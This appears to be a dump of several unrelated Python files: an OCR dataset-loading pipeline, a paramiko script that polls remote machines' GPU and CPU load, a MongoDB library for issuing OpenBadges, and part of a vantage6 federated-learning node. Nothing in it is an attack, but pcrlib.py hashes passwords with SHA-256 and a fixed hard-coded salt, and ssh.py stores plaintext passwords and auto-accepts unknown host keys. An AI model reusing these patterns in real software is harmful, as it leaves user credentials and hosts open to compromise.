raise AssertionError("InputDataset is not initialised. Call 'with InputDataset() as input_dataset:'. "
"After the scope is closed the threads will be closed, too, for cleaning up.")
@abstractmethod
def __len__(self):
return 0
@abstractmethod
def epoch_size(self):
return len(self)
@property
def generate_only_non_augmented(self):
return self._generate_only_non_augmented.value
@generate_only_non_augmented.setter
def generate_only_non_augmented(self, value):
self._generate_only_non_augmented.value = value
@abstractmethod
def text_generator(self) -> Generator[str, None, None]:
self.check_initialized()
@abstractmethod
def generator(self, epochs=1, text_only=False) -> Generator[Tuple[np.array, List[str], Any], None, None]:
self.check_initialized()
class RawInputDataset(InputDataset):
def __init__(self,
mode: DataSetMode,
raw_datas, raw_texts, raw_params,
):
super().__init__(mode)
self.preloaded_datas, self.preloaded_texts, self.preloaded_params = raw_datas, raw_texts, raw_params
def __len__(self):
if self._generate_only_non_augmented.value:
return len(self.preloaded_params)
return len(self.preloaded_datas)
def epoch_size(self):
return len(self)
def text_generator(self) -> Generator[str, None, None]:
self.check_initialized()
for text in self.preloaded_texts:
yield text
def generator(self, epochs=1, text_only=False) -> Generator[Tuple[np.array, List[str], Any], None, None]:
self.check_initialized()
for epoch in range(epochs):
if self.mode == DataSetMode.TRAIN:
# only train here, pred and eval are covered by the else block
# train mode won't generate parameters
if self._generate_only_non_augmented.value:
# preloaded datas are ordered: first the original data, then the augmented data; however,
# preloaded params only store the 'length' of the non-augmented data,
# thus only original data is yielded here
for data, text, params in zip(self.preloaded_datas, self.preloaded_texts, self.preloaded_params):
yield data, text, None
else:
# yield all data, however no params
for data, text in zip(self.preloaded_datas, self.preloaded_texts):
yield data, text, None
else:
# all other modes generate everything we got, but do not support data augmentation
for data, text, params in zip(self.preloaded_datas, self.preloaded_texts, self.preloaded_params):
yield data, text, params
class StreamingInputDataset(InputDataset):
def __init__(self,
dataset: DataSet,
data_preprocessor: DataPreprocessor,
text_preprocessor: TextProcessor,
data_augmenter: DataAugmenter = None,
data_augmentation_amount: float = 0,
skip_invalid_gt=True,
processes=4):
super().__init__(dataset.mode)
self.dataset = dataset
self.data_processor = data_preprocessor
self.text_processor = text_preprocessor
self.skip_invalid_gt = skip_invalid_gt
self.data_augmenter = data_augmenter
self.data_augmentation_amount = data_augmentation_amount
self.mp_context = multiprocessing.get_context('spawn')
self.processes = max(1, processes)
if data_augmenter and dataset.mode != DataSetMode.TRAIN and dataset.mode != DataSetMode.PRED_AND_EVAL:
# PRED_AND_EVAL is also allowed here, since it can use augmentation as well
raise Exception('Data augmentation is only supported for training, but got {} dataset instead'.format(dataset.mode))
if data_augmentation_amount > 0 and self.data_augmenter is None:
raise Exception('Requested data augmentation, but no data augmenter provided. Use e.g. SimpleDataAugmenter')
self.data_input_queue = None
self.unordered_output_queue = None
self.data_processing_tasks = []
self.data_generator = None
self.ordered_output_queue = None
self.data_ordering = None
def __enter__(self):
super().__enter__()
# create all tasks and queues
self.max_queuer = MaxElementsQueuer(self.processes * 4, ctx=self.mp_context)
self.data_input_queue = self.max_queuer.input_queue
self.ordered_output_queue = self.max_queuer.output_queue
self.unordered_output_queue = self.mp_context.JoinableQueue()
self.data_processing_tasks = [
DataProcessingTask(
DataProcessingTaskData(
self.skip_invalid_gt,
self.data_augmentation_amount if self.data_augmentation_amount < 1 else 1 - 1 / (self.data_augmentation_amount + 1),
self.text_processor,
self.data_processor,
self.data_augmenter,
self._generate_only_non_augmented,
),
self.data_input_queue,
self.unordered_output_queue,
) for _ in range(self.processes)
]
self.data_generator = self.dataset.create_generator(self.mp_context, self.data_input_queue)
self.data_generator.start()
self.data_ordering = OrderedQueueTask(self.unordered_output_queue, self.ordered_output_queue, self.mp_context)
self.data_ordering.start()
for p in self.data_processing_tasks:
p.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
# stop all tasks
self.data_generator.stop()
for p in self.data_processing_tasks:
p.stop()
self.data_ordering.stop()
self.data_input_queue = None
self.unordered_output_queue = None
self.data_processing_tasks = []
self.data_generator = None
self.ordered_output_queue = None
self.data_ordering = None
super().__exit__(exc_type, exc_val, exc_tb)
def __len__(self):
return len(self.dataset.samples())
def epoch_size(self):
if self._generate_only_non_augmented.value:
return len(self)
if self.data_augmentation_amount >= 1:
return int(len(self) * (1 + self.data_augmentation_amount))
return int(1 / (1 - self.data_augmentation_amount) * len(self))
def to_raw_input_dataset(self, processes=1, progress_bar=False, text_only=False) -> RawInputDataset:
print("Preloading dataset type {} with size {}".format(self.dataset.mode, len(self)))
prev = self._generate_only_non_augmented.value
self._generate_only_non_augmented.value = True
datas, texts, params = zip(*list(tqdm_wrapper(self.generator(epochs=1, text_only=text_only),
desc="Preloading data", total=len(self.dataset),
progress_bar=progress_bar)))
preloaded_datas, preloaded_texts, preloaded_params = datas, texts, params
self._generate_only_non_augmented.value = prev
if (self.dataset.mode == DataSetMode.TRAIN or self.dataset.mode == DataSetMode.PRED_AND_EVAL) and self.data_augmentation_amount > 0:
abs_n_augs = int(self.data_augmentation_amount) if self.data_augmentation_amount >= 1 else int(self.data_augmentation_amount * len(self))
preloaded_datas, preloaded_texts \
= self.data_augmenter.augment_datas(list(datas), list(texts), n_augmentations=abs_n_augs,
processes=processes, progress_bar=progress_bar)
return RawInputDataset(self.mode, preloaded_datas, preloaded_texts, preloaded_params)
def text_generator(self) -> Generator[str, None, None]:
self.check_initialized()
for _, text, _ in self.generator(epochs=1, text_only=True):
if self.text_processor:
text = self.text_processor.apply([text], 1, False)[0]
yield text
def generator(self, epochs=1, text_only=False) -> Generator[Tuple[np.array, List[str], Any], None, None]:
self.check_initialized()
self.data_generator.request(epochs, text_only)
for epoch in range(epochs):
for iter in range(len(self.dataset)):
while True:
try:
global_id, id, line, text, params = self.ordered_output_queue.get(timeout=0.1)
yield line, text, params
except queue.Empty:
                        # check whether the data ordering process has died and the queue is drained
if not self.data_ordering.p.is_alive() and self.ordered_output_queue.empty():
return
continue
except KeyboardInterrupt:
return
break
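# A minimal usage sketch, assuming the class defined above is named `InputDataset`
# and using the SimpleDataAugmenter suggested in the constructor's error message:
#
#     with InputDataset(dataset, data_preprocessor, text_preprocessor,
#                       data_augmenter=SimpleDataAugmenter(),
#                       data_augmentation_amount=0.5) as input_dataset:
#         for line, text, params in input_dataset.generator(epochs=1):
#             pass  # consume preprocessed (and possibly augmented) samples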
|
ssh.py
|
import logging
import socket
import threading
import paramiko
import configparser
import csv
import io
import time
ref = {
'timestamp': 0,
'name': 1,
'index': 2,
'utilization.gpu': 3,
'memory.total': 4,
'memory.free': 5,
'power.limit': 6,
'power.draw': 7
}
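# Example of a single nvidia-smi CSV line that the indices above refer to
# (values are illustrative only):
#   2021/01/01 12:00:00.000, GeForce RTX 2080 Ti, 0, 35 %, 11019 MiB, 9500 MiB, 250.00 W, 60.12 W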
pause = False
def visualize(ssh_id, host, csv_str_gpu, str_ncore, str_cpu, host_info):
info = csv.reader(io.StringIO(csv_str_gpu))
rec_g = []
for line in info:
name = line[ref['name']].strip()
index = line[ref['index']].strip()
util = line[ref['utilization.gpu']].strip()
mem_tot = line[ref['memory.total']].strip()
mem_fre = line[ref['memory.free']].strip()
pwr_lim = line[ref['power.limit']].strip()
pwr_drw = line[ref['power.draw']].strip()
rec_g.append([name, index, util, mem_tot, mem_fre, pwr_lim, pwr_drw])
rec_c = str_cpu.strip().split(' ')
rec_n = str_ncore.strip()
host_info[ssh_id] = [host, rec_g, rec_n, rec_c]
def query_host(ssh_id, host, ssh_cfg, host_info, timeout):
# create
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
# always try to reconnect if connection failed
while True:
try:
# connect
ssh.connect(hostname=ssh_cfg["hostname"], port=ssh_cfg["port"], username=ssh_cfg["username"], password=ssh_cfg["password"], timeout=timeout)
gpu_str = "nvidia-smi --format=csv,noheader --query-gpu=timestamp,name,index,utilization.gpu,memory.total,memory.free,power.limit,power.draw"
ncore_str = "cat /proc/cpuinfo | grep processor | wc -l"
cpu_str = "cat /proc/loadavg"
while True:
stdin, stdout, stderr = ssh.exec_command(gpu_str, timeout=timeout)
out, err = stdout.read(), stderr.read()
if not out:
raise paramiko.SSHException
res_g = out
res_g = res_g.decode()
stdin, stdout, stderr = ssh.exec_command(ncore_str, timeout=timeout)
out, err = stdout.read(), stderr.read()
if not out:
raise paramiko.SSHException
res_n = out
res_n = res_n.decode()
stdin, stdout, stderr = ssh.exec_command(cpu_str, timeout=timeout)
out, err = stdout.read(), stderr.read()
if not out:
raise paramiko.SSHException
res_c = out
res_c = res_c.decode()
visualize(ssh_id, host, res_g, res_n, res_c, host_info)
time.sleep(3)
except (paramiko.SSHException, socket.error):
continue
except Exception as e:
logging.exception(e)
finally:
ssh.close()
def init():
cfg = configparser.ConfigParser()
cfg.read("ssh.config", encoding="utf-8")
host_names = cfg.sections()
cfg_name, host_names = host_names[0], host_names[1:]
if cfg_name != 'config':
raise Exception('[config] item should come first in configure file!')
cfg_dict = {}
cfg_dict['refresh'] = cfg.getint(cfg_name, 'refresh')
cfg_dict['timeout'] = cfg.getint(cfg_name, 'timeout')
cfg_dict['warmup'] = cfg.getint(cfg_name, 'warmup')
ssh_pool = {}
for host in host_names:
# read from config file
hostname = cfg.get(host, "hostname")
port = cfg.getint(host, "port")
username = cfg.get(host, "username")
password = cfg.get(host, "password")
ssh_cfg = {"hostname": hostname, "port": port, "username": username, "password": password}
# record
ssh_pool[host] = ssh_cfg
return ssh_pool, cfg_dict
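# A sketch of the ssh.config layout that init() expects (all values below are
# placeholders, not real hosts or credentials):
#
#   [config]
#   refresh = 2
#   timeout = 5
#   warmup = 3
#
#   [gpu-server-1]
#   hostname = 192.168.0.10
#   port = 22
#   username = user
#   password = secret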
if __name__ == '__main__':
    ssh_pool, cfg_dict = init()
    host_info = {}
    for (ssh_id, (host, ssh_cfg)) in enumerate(ssh_pool.items()):
        t = threading.Thread(target=query_host, args=(ssh_id, host, ssh_cfg, host_info, cfg_dict['timeout']))
t.start()
print(host_info)
time.sleep(0.55)
print(host_info)
time.sleep(1)
print(host_info)
time.sleep(1)
print(host_info)
time.sleep(1)
print(host_info)
|
pcrlib.py
|
# pcrlib.py
###########################################################################################
# Author: Josh Joseph joshmd@bu.edu
# 4/29/16
# This is the main function library file for PCR hero....
from pymongo import MongoClient
from bson.objectid import ObjectId
import hashlib
import json
import bson.json_util
import time
import datetime
import requests
import threading
import requests
HOSTIP = requests.get('https://ipapi.co/ip/').text + ":8080/"
HOMEDIR = '/home/ubuntu/BadgeAPI/'
class PCRUser:
'''This is a convenience class which verifies that entries to the users collection are valid'''
def __init__(self, email, name, hashword):
self.email = email
self.name = name
self.hashword = hashword
def output(self):
return {"email" : self.email, "name" : self.name, "hashword" : self.hashword}
class PCRIssuer:
'''This is a convenience class which verifies that entries to the issuers collection are valid'''
def __init__(self, name, description, url):
self.name = name
self.description = description
self.url = url
def output(self):
"""returns attributes as a python dictionary"""
return {"name" : self.name, "description" : self.description, "url" : self.url}
def jsonize(self):
"""Returns a JSON file with the base badge info - needed for posting/hosting, baking, and awarding"""
data = json.dumps(self.output())
return data
def establish_here(self, hostdir= HOMEDIR + "issuers/"):
"""Uploads a JSON version of the issuer to the host server.
Needed to award the badge."""
badgeJSON = self.jsonize()
outfile = open(hostdir + self.name + ".json", 'w')
outfile.write(badgeJSON)
outfile.close()
def add_issuer(self, db):
"""adds the issuer to the database"""
db.issuers.insert_one(self.output())
class OpenBadge:
def __init__(self, name, description, image, criteria, tags, issuer):
"""This creates the base badge with the badge name, image URL, description, criteria URL, issuer json URL"""
self.name = name
## need sanitizing function here for name - sub for space
self.description = description
self.image = HOSTIP + "images/" + image
self.criteria = establish_criteria(name, criteria)
self.tags = tags.split()
self.issuer = HOSTIP + "issuers/" + issuer + ".json"
## need sanitizing function here for issuer - sub for space
def jsonize(self):
"""Returns a JSON file with the base badge info - needed for posting/hosting, baking, and awarding"""
data = json.dumps({"name": self.name, "description": self.description, "image": self.image, "criteria": self.criteria, "tags": self.tags, "issuer": self.issuer})
return data
def output(self):
"""Returns a dict with the base badge info - needed for posting/hosting, baking, and awarding"""
data = {"name": self.name, "description": self.description, "image": self.image, "criteria": self.criteria, "tags": self.tags, "issuer": self.issuer}
return data
def establish_here(self, hostdir= HOMEDIR + "badges/"):
"""Uploads a JSON version of the base badge class to the host server.
Needed to award the badge. Creates a .json file and adds it to the database"""
badgeJSON = self.jsonize()
outfile = open(hostdir + self.name.replace(" ", "-") + ".json", 'w')
outfile.write(badgeJSON)
outfile.close()
def add_badge(self, db):
"""add the badge to the database"""
db.badges.insert_one(self.output())
class Task:
"""base class for tasks
tasks are instantiated by the admin-tasks menu, which also assigns them"""
def __init__(self, user, badge, app):
self.user = user
self.badge = badge
self.app = app
def output(self):
pass
def assign(self, db):
"""checks for duplicates, returns false if duplicate, if not, logs the task and returns true"""
## check for duplicates
if(check_for_task(db, self.badge, self.user, self.app) != None):
return False
## if not, assign away...
else:
db.tasks.insert_one(self.output())
return True
class PercentTask(Task):
def __init__(self, user, badge, app, circuit, score, percent):
super().__init__(user, badge, app)
self.type = "percent"
self.circuit = circuit
self.score = score
self.percent = percent
self.goalScore = score * (percent / 100.0) ## this is the improved target score
def output(self):
"""returns output as a dict - exactly as we'll need for mongodb...
returns useremail, badgename, app, type, circuit, initial score, target score"""
data = {"user": self.user, "badge": self.badge, "app": self.app, "type": self.type, "circuit": self.circuit, "score": self.score, "goalScore": self.goalScore}
return data
class RepeatTask(Task):
def __init__(self, user, badge, app, circuit, repeat):
super().__init__(user, badge, app)
self.type = "repeat"
self.circuit = circuit
self.repeatTarget = repeat
self.repeatCount = 0 ## the number of times it has been repeated...
def output(self):
"""returns output as a dict - exactly as we'll need for mongodb..."""
data = {"user": self.user, "badge": self.badge, "app": self.app, "type": self.type, "circuit": self.circuit, "repeatTarget": self.repeatTarget, "count": self.repeatCount}
return data
class UniqueTask(Task):
def __init__(self, user, badge, app, unique):
super().__init__(user, badge, app)
self.type = "unique"
self.uniqueGoal = unique ## needed number of unique submissions
self.uniqueList = [] ## list of submissions
def output(self):
"""returns output as a dict - exactly as we'll need for mongodb..."""
data = {"user": self.user, "badge": self.badge, "app": self.app, "type": self.type, "uniqueGoal": self.uniqueGoal, "uniqueList": self.uniqueList}
return data
class TimeTrialTask(Task):
def __init__(self, user, badge, app, days, hours, minutes, circuit, tasknum):
super().__init__(user, badge, app)
self.type = "timetrial"
self.circuit = circuit
self.tasknumGoal = tasknum
self.tasksDone = 0
self.days = days
self.hours = hours
self.minutes = minutes
now = datetime.datetime.now()
setTime = now + datetime.timedelta(days = self.days, hours=self.hours, minutes=self.minutes)
self.duedate = setTime
def output(self):
"""returns output as a dict - exactly as we'll need for mongodb..."""
data = {"user": self.user, "badge": self.badge, "app": self.app, "type": self.type, "circuit": self.circuit, "tasknumGoal": self.tasknumGoal, "tasksDone": self.tasksDone, "duedate" : self.duedate}
return data
class PerformanceTask(Task):
def __init__(self, user, badge, app, circuit, targetyield, cost):
super().__init__(user, badge, app)
self.type = "performance"
self.circuit = circuit
self.targetyield = targetyield
self.cost = cost ## the cost that one needs to stay below...
def output(self):
"""returns output as a dict - exactly as we'll need for mongodb..."""
data = {"user": self.user, "badge": self.badge, "app": self.app, "type": self.type, "circuit": self.circuit, "targetyield": self.targetyield, "cost": self.cost}
return data
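# A minimal sketch of creating and assigning a task (the email, badge, app and
# circuit names below are placeholders):
#
#   db = get_db("pcrhero")
#   task = PercentTask("user@example.com", "Circuit Master", "pcr-app",
#                      circuit="circuit-1", score=200, percent=10)
#   if task.assign(db):
#       print("task assigned")
#   else:
#       print("duplicate task for this user/badge/app, not assigned")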
def award_badge_to_user(db, badgename, username, hostdir=HOMEDIR + "awardedbadges/"):
"""awards a badge to a recipient, creating a publicly hosted json of the badge info (a badge assertion)
located at "http://HOMEIP/awardedbadges/"
the recipient will be a json with the user's email (hashed), type (email), hashed (boolean), and salt"""
### Part one - create the badge assertion
email = username
username = sanitize(username)
badgename = badgename.replace(" ", "-")
badgesource = open(HOMEDIR + "badges/" + badgename + ".json", "r")
badgedict = json.load(badgesource)
uid = username + badgename ## this is a unique internal identifier for the mozilla standard
verifyAddress = HOSTIP + "awardedbadges/" + uid + ".json"
badgeAddress = HOSTIP + "badges/" + badgename + ".json"
issuedOn = str(time.time()).split('.')[0]
verify = {"type": "hosted", "url": verifyAddress}
recipient = create_recipient(email)
data = json.dumps({"uid": uid, "recipient": recipient, "image": badgedict['image'], "issuedOn": issuedOn, "badge": badgeAddress, "verify": verify})
print(data)
# ASSERTION FILE #
outfile = open(hostdir + uid + ".json", 'w') ## so the final assertion is at /awardedbadges/sanitized+badgename.json
outfile.write(data)
outfile.close()
### Part two - add the badge to the user's profile
entry = {"email": email}
# get the stored JSON data from the badge file, store it in a dict
db.users.update_one(entry, {"$push":{"badges": badgedict}})
# BAKED IMAGE + ADD BADGE TO USERS PROFILE
bake(badgename, username, badgedict, db)
################################################################################################################
# Badge Baking Function - use with caution
# This sends the badge info to the Mozilla Badge Baking API. The issue with this is that you need somewhere to
# actually put it - unless the mozilla badge display API is also added to the site (needs node.js)
# then it only shows the png, rather than any of the metadata.
# one option would be to email it to users, or to simply host it at a specific location and add a download link.
################################################################################################################
def bake(badgename, username, badgedict, db, hostname=(HOSTIP +"badges/")):
"""Uses the existing Mozilla Badge Baking Web API to create a png with baked-in data
badgename is a json, host is a url leading to the badge directory, filename is the output png (needs a path!)"""
email = username
username = sanitize(username)
badgename = badgename.replace(" ", "-")
uid = username + badgename
fileExt = "bakedawarded/" + "bake" + uid + ".png"
hostedURL = HOSTIP + "awardedbadges/" + uid + ".json"
print("Badge hosted at " + hostedURL)
getURL = "http://backpack.openbadges.org/baker?assertion=" + hostedURL
print("Baking badge at " + getURL)
bakePlease = threading.Thread(target = threadBake, args = (getURL, fileExt, badgedict, email, db))
bakePlease.start()
def threadBake(getURL, filename, badgedict, email, db):
returnObj = "none"
    response = requests.get(getURL)
if(response.status_code == 200):
print("Baking badge... %s" % (HOSTIP + filename))
with open(HOMEDIR + filename, 'wb') as f:
for chunk in response.iter_content(1024):
f.write(chunk)
        returnObj = filename
print("Badge baked!")
else:
print("Something went wrong...")
print(response.status_code)
print(response.text)
def check_for_task(db, badgename, username, appname):
return db.tasks.find_one({"user": username, "badge": badgename, "app": appname})
def find_task_by_id(db, id):
entry = {'_id': ObjectId(id)}
return db.tasks.find_one(entry)
def increment_task_by_id(db, id, field):
entry = {'_id': ObjectId(id)}
db.tasks.update_one(entry, {'$inc': {field: 1}})
def update_task_by_id(db, id, field, score):
entry = {'_id': ObjectId(id)}
db.tasks.update_one(entry, {'$set': {field: score}})
def remove_task_by_id(db, id):
entry = {'_id': ObjectId(id)}
db.tasks.delete_one(entry)
def get_users_tasks(db, username):
return db.tasks.find({"user": username})
def get_users_tasks_for_app(db, username, appname):
return db.tasks.find({"user": username, "app": appname})
def get_users_by_badge(db, badgename):
search = list(db.users.find({"badges.name" : badgename },projection = {"name" : 1, "email" : 1, "_id" : 0}))
search = bson.json_util.dumps(search)
return search
def returnable(dbFind):
returning = list(dbFind)
returning = bson.json_util.dumps(returning)
return returning
def check_task_datetime(db, task):
'''checks the task's due date - returns true if time is up!'''
now = datetime.datetime.now()
if(task['duedate'] < now):
return True
else:
return False
## badge bake utility
def sanitize(username):
username = username.replace('.', '-dot-')
username = username.replace('@', '-at-')
return username
def create_recipient(email):
data = {"identity": shaHash(email, "deadsea"), "type": "email", "hashed": "true", "salt": "deadsea"}
return data
def get_badges(db):
return db.badges.find()
def find_badge(db, badgename):
entry = {"name": badgename}
return db.badges.find_one(entry)
def establish_criteria(badgename, criteria):
"""establishses a criteria file at /criteria/badgename.html to satisfy OpenBadges Requirements
returns a link for use in the badge"""
badgename = badgename.replace(" ", "-")
criteria_file = open(HOMEDIR + "criteria/" + badgename + ".html", 'w')
criteria_file.write(criteria)
criteria_file.close()
return HOSTIP + "criteria/" + badgename + ".html"
def get_db(dbname):
client = MongoClient('localhost:27017')
db = getattr(client, dbname)
return db
def add_person(db, personObj):
entry = personObj
db.users.insert_one(entry.output())
def get_person(db, email):
entry = {"email": email}
return db.users.find_one(entry)
def get_user_hashword(db, email):
targetperson = get_person(db, email)
return targetperson['hashword']
def get_users(db):
return db.users.find()
def find_person(db):
'''finds a person - underlying assumption is that user emails will be unique...'''
email = input("Please enter an email: ")
print(get_person(db, email))
def shaHash(email, salt):
target = (email + salt).encode('UTF-8')
return 'sha256$' + hashlib.sha256(target).hexdigest()
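# e.g. shaHash("user@example.com", "deadsea") returns a string of the form
# 'sha256$' followed by 64 hexadecimal characters.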
def add_person_request(db):
newEmail = input("please enter an email: ")
newName = input("please enter a name: ")
newHashword = input("please enter a password: ")
newHashword = shaHash(newHashword, "deadsea")
personObj = PCRUser(newEmail, newName, newHashword)
    add_person(db, personObj)
def menu(db):
''' used to test functions without using the main server file. deprecated, but has its uses'''
command = input("Please choose an option (A)dd, (F)ind, (B)adge Utilities, (Q)uit: ")
if(command == "A" or command == 'a'):
add_person_request(db)
return True
elif(command == "B" or command == "b"):
email = input("Enter the user's email: ")
get_users_badges(db, email)
elif(command == "F" or command == "f"):
find_person(db)
return True
elif(command == "Q" or command == "q"):
return False
else:
print("Invalid command!")
return True
def get_users_badges(db, email):
'''obtains badge info from a user's profile - returns an array of arrays'''
entry = {"email": email}
badges = db.users.find_one(entry, {"badges":1}) # this is a 'mask' for the return
try:
return badges['badges']
except KeyError:
badges = []
return badges
def get_users_apps(db, email):
'''obtains app info from a user's profile - returns an array of arrays'''
entry = {"email": email}
apps = db.users.find_one(entry, {"apps":1}) # this is a 'mask' for the return
try:
return apps['apps'] ## this is an array of app names
except KeyError:
apps = []
return apps
def get_app(db, appname):
'''obtains an app from the list'''
entry = {"name": appname}
return db.apps.find_one(entry)
def get_all_apps(db):
'''returns a list of all app names in the database'''
apps = db.apps.find()
applist = []
for app in apps:
applist.append(app['name'])
return applist
def add_issuer(db, issuerObject):
'''adds an issuer to the library of issuers'''
entry = issuerObject
db.issuers.insert_one(entry.output())
def get_issuers(db):
issuers = db.issuers.find()
issuerList = []
for issuer in issuers:
issuerList.append(issuer['name'])
return issuerList
def find_issuer(db, issuername):
entry = {"name": issuername}
return db.issuers.find_one(entry)
def main():
'''deprecated now that the site seems to work, but useful if testing utilities'''
db = get_db("pcrhero")
menuFlag = True
while(menuFlag):
menuFlag = menu(db)
badges = (get_users_badges(db, 'beepboop@gmail.com'))
for badge in badges:
print(badge)
print('\n')
for person in (db.users.find()):
print(person)
print(get_issuers(db))
if __name__ == "__main__":
main()
|
__init__.py
|
""" Node
A node in its simplest would retrieve a task from the central server by
an API call, run this task and finally return the results to the central
server again.
The node application is separated into 4 threads:
- main thread, waits for new tasks to be added to the queue and
    runs the tasks
- listening thread, listens for incoming websocket messages, which
    are handled by NodeTaskNamespace
- speaking thread, waits for results from docker to return and posts
    them to the central server
- proxy server thread, provides an interface for master containers
to post tasks and retrieve results
"""
import sys
import os
import random
import time
import datetime
import logging
import queue
import shutil
import json
from pathlib import Path
from threading import Thread
from socketIO_client import SocketIO, SocketIONamespace
from gevent.pywsgi import WSGIServer
from . import globals as cs
from vantage6.node.docker_manager import DockerManager
from vantage6.node.server_io import NodeClient
from vantage6.node.proxy_server import app
from vantage6.node.util import logger_name
class NodeTaskNamespace(SocketIONamespace):
"""Class that handles incoming websocket events."""
# reference to the node objects, so a callback can edit the
# node instance.
# FIXME: why is this a *class* attribute?
node_worker_ref = None
def __init__(self, *args, **kwargs):
""" Handler for a websocket namespace.
"""
super().__init__(*args, **kwargs)
self.log = logging.getLogger(logger_name(__name__))
self.node_worker_ref = None
def set_node_worker(self, node_worker):
""" Reference Node that created this Namespace.
            This way we can call methods on the node worker, allowing
for actions to be taken.
:param node_worker: Node object
"""
self.node_worker_ref = node_worker
def on_message(self, data):
self.log.info(data)
def on_disconnect(self):
""" Server disconnects event."""
# self.node_worker_ref.socketIO.disconnect()
self.log.info('Disconnected from the server')
def on_new_task(self, task_id):
""" New task event."""
if self.node_worker_ref:
self.node_worker_ref.get_task_and_add_to_queue(task_id)
self.log.info(f'New task has been added task_id={task_id}')
else:
self.log.critical(
                'Task Master Node reference not set in socket namespace'
)
def on_container_failed(self, run_id):
"""A container in the collaboration has failed event.
TODO handle run sequence at this node. Maybe terminate all
containers with the same run_id?
"""
self.log.critical(
f"A container on a node within your collaboration part of "
f"run_id={run_id} has exited with a non-zero status_code"
)
def on_expired_token(self, msg):
self.log.warning("Your token is no longer valid... reconnecting")
self.node_worker_ref.socketIO.disconnect()
self.log.debug("Old socket connection terminated")
self.node_worker_ref.server_io.refresh_token()
self.log.debug("Token refreshed")
self.node_worker_ref.connect_to_socket()
self.log.debug("Connected to socket")
# FIXME: This won't work: you're trying to access a private method!?
# self.node_worker_ref.__sync_task_queue_with_server()
# self.log.debug("Tasks synced again with the server...")
# ------------------------------------------------------------------------------
class Node(object):
"""Node to handle incomming computation requests.
The main steps this application follows: 1) retrieve (new) tasks
from the central server, 2) kick-off docker algorithm containers
based on this task and 3) retrieve the docker results and post
them to the central server.
TODO: read allowed repositories from the config file
"""
def __init__(self, ctx):
""" Initialize a new Node instance.
        Authenticates to the central server, sets up encryption and a
        websocket connection, retrieves tasks that were posted while
        offline, prepares the dataset for usage and finally sets up a
        local proxy server.
:param ctx: application context, see utils
"""
self.log = logging.getLogger(logger_name(__name__))
self.ctx = ctx
self.config = ctx.config
self.queue = queue.Queue()
self._using_encryption = None
# initialize Node connection to the server
self.server_io = NodeClient(
host=self.config.get('server_url'),
port=self.config.get('port'),
path=self.config.get('api_path')
)
self.log.info(f"Connecting server: {self.server_io.base_path}")
# Authenticate with the server, obtaining a JSON Web Token.
# Note that self.authenticate() blocks until it succeeds.
self.log.debug("Authenticating")
self.authenticate()
# Setup encryption
self.setup_encryption()
# Thread for proxy server for algorithm containers, so they can
# communicate with the central server.
self.log.info("Setting up proxy server")
t = Thread(target=self.__proxy_server_worker, daemon=True)
t.start()
# Create a long-lasting websocket connection.
self.log.debug("Creating websocket connection with the server")
self.connect_to_socket()
# Check if new tasks were posted while offline.
self.log.debug("Fetching tasks that were posted while offline")
self.__sync_task_queue_with_server()
# If we're in a 'regular' context, we'll copy the dataset to our data
# dir and mount it in any algorithm container that's run; bind mounts
# on a folder will work just fine.
#
# If we're running in dockerized mode we *cannot* bind mount a folder,
# because the folder is in the container and not in the host. We'll
# have to use a docker volume instead. This means:
# 1. we need to know the name of the volume so we can pass it along
# 2. need to have this volume mounted so we can copy files to it.
#
# Ad 1: We'll use a default name that can be overridden by an
# environment variable.
# Ad 2: We'll expect `ctx.data_dir` to point to the right place. This
# is OK, since ctx will be a DockerNodeContext.
#
# This also means that the volume will have to be created & mounted
# *before* this node is started, so we won't do anything with it here.
# We'll create a subfolder in the data_dir. We need this subfolder so
# we can easily mount it in the algorithm containers; the root folder
        # may contain the private key, which we don't want to share.
# We'll only do this if we're running outside docker, otherwise we
# would create '/data' on the data volume.
if not ctx.running_in_docker:
task_dir = ctx.data_dir / 'data'
os.makedirs(task_dir, exist_ok=True)
else:
task_dir = ctx.data_dir
self.log.debug("Setting up the docker manager")
self.__docker = DockerManager(
allowed_images=self.config.get("allowed_images"),
tasks_dir=task_dir,
isolated_network_name=f"{ctx.docker_network_name}-net",
node_name=ctx.name,
data_volume_name=ctx.docker_volume_name,
)
# login to the registries
self.__docker.login_to_registries(
self.ctx.config.get("docker_registries", [])
)
# If we're running in a docker container, database_uri would point
# to a path on the *host* (since it's been read from the config
# file). That's no good here. Therefore, we expect the CLI to set
# the environment variable for us. This has the added bonus that we
# can override the URI from the command line as well.
default_uri = self.config['databases']['default']
database_uri = os.environ.get('DATABASE_URI', default_uri)
if Path(database_uri).exists():
# We'll copy the file to the folder `data` in our task_dir.
self.log.info(f'Copying {database_uri} to {task_dir}')
shutil.copy(database_uri, task_dir)
# Since we've copied the database to the folder 'data' in the root
# of the volume: '/data/<database.csv>'. We'll just keep the
# basename (i.e. filename + ext).
database_uri = os.path.basename(database_uri)
# Connect to the isolated algorithm network *only* if we're running in
# a docker container.
if ctx.running_in_docker:
self.__docker.connect_to_isolated_network(
ctx.docker_container_name,
aliases=[cs.NODE_PROXY_SERVER_HOSTNAME]
)
#self.__docker.connect_to_overlay_network(
# ctx.docker_container_name,
# aliases=[cs.NODE_PROXY_SERVER_HOSTNAME]
#)
# Let's keep it safe
self.__docker.set_database_uri(database_uri)
# Thread for sending results to the server when they come available.
self.log.debug("Start thread for sending messages (results)")
t = Thread(target=self.__speaking_worker, daemon=True)
t.start()
# listen forever for incoming messages, tasks are stored in
# the queue.
self.log.debug("Starting thread for incoming messages (tasks)")
t = Thread(target=self.__listening_worker, daemon=True)
t.start()
self.log.info('Init complete')
def __proxy_server_worker(self):
""" Proxy algorithm container communcation.
A proxy for communication between algorithms and central
server.
"""
# supply the proxy server with a destination (the central server)
        # we might want to not use environment vars
os.environ["SERVER_URL"] = self.server_io.host
os.environ["SERVER_PORT"] = self.server_io.port
os.environ["SERVER_PATH"] = self.server_io.path
if self.ctx.running_in_docker:
# cs.NODE_PROXY_SERVER_HOSTNAME points to the name of the proxy
# when running in the isolated docker network.
default_proxy_host = cs.NODE_PROXY_SERVER_HOSTNAME
else:
# If we're running non-dockerized, assume that the proxy is
# accessible from within the docker algorithm container on
# host.docker.internal.
default_proxy_host = 'host.docker.internal'
# If PROXY_SERVER_HOST was set in the environment, it overrides our
# value.
proxy_host = os.environ.get("PROXY_SERVER_HOST", default_proxy_host)
os.environ["PROXY_SERVER_HOST"] = proxy_host
proxy_port = int(os.environ.get("PROXY_SERVER_PORT", 8080))
# 'app' is defined in vantage6.node.proxy_server
# app.debug = True
app.config["SERVER_IO"] = self.server_io
